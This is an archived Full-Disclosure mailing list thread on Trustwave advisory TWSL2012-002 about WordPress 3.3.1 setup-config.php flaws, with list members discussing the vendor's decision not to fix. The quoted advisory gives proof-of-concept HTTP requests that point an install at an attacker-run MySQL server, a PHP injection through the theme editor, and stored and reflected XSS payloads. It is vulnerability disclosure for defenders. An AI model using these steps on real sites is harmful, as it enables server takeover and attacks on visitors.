Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wed, Jan 25, 2012 at 04:13:12PM +, Benji wrote: Yes it does. wp-admin/setup-config.php?step=1 on any wp install where it exists gives this: The file 'wp-config.php' already exists one level above your WordPress installation. If you need to reset any of the configuration items in this file, please delete it first. Yes this is correct information at least with new versions of WordPress. We are running pretty big Linux-server in our organization and I can tell you that open install me -pages are very common and I see these as problem. I can try to find out what went wrong with the installation or did they remove the WordPress-installation and didn't understand to remove everything included. I really hope to see this patched anyways just to be sure. I don't know what the actual impact in user-experience can be. Could WordPress comment? - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details: Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small. However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Henri Salo Sent: Tuesday, January 24, 2012 5:48 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote: Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 -- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_sub mit=Submit Request #2 -- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: ?php phpinfo(); ? Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request --- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query --- update wp_comments SET comment_content='scriptalert('123')/script' where comment_content='Hi, this is a comment.br /To delete \ a comment, just log
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote: The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details: Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small. However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Yes it does. wp-admin/setup-config.php?step=1 on any wp install where it exists gives this: The file 'wp-config.php' already exists one level above your WordPress installation. If you need to reset any of the configuration items in this file, please delete it first. On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki julius.kivim...@gmail.comwrote: Funny but no, this does not need a non-installed wordpress. 2012/1/25 Benji m...@b3nji.com Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Funny but no, this does not need a non-installed wordpress. 2012/1/25 Benji m...@b3nji.com Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 -- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_submit=Submit Request #2 -- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: ?php phpinfo(); ? Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request --- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query --- update wp_comments SET comment_content='scriptalert('123')/script' where comment_content='Hi, this is a comment.br /To delete \ a comment, just log in and view the post#039;s comments. There you will have the option to edit or delete them.'; Non-malicious User Visits Wordpress installation and has Javascript executed on their browser Request --- GET /?p=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page CVE: CVE-2012-0782 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply javascript within the dbname, dbhost or uname parameters. Upon clicking the submission button, the javascript is rendered in the client's browser. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server Request --- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Content-Type:
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote: Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 -- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_submit=Submit Request #2 -- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: ?php phpinfo(); ? Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request --- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query --- update wp_comments SET comment_content='scriptalert('123')/script' where comment_content='Hi, this is a comment.br /To delete \ a comment, just log in and view the post#039;s comments. There you will have the option to edit or delete them.'; Non-malicious User Visits Wordpress installation and has Javascript executed on their browser Request --- GET /?p=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page CVE: CVE-2012-0782 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply javascript within the dbname, dbhost or uname parameters. Upon clicking the submission button, the javascript is rendered in the client's browser. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server Request --- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8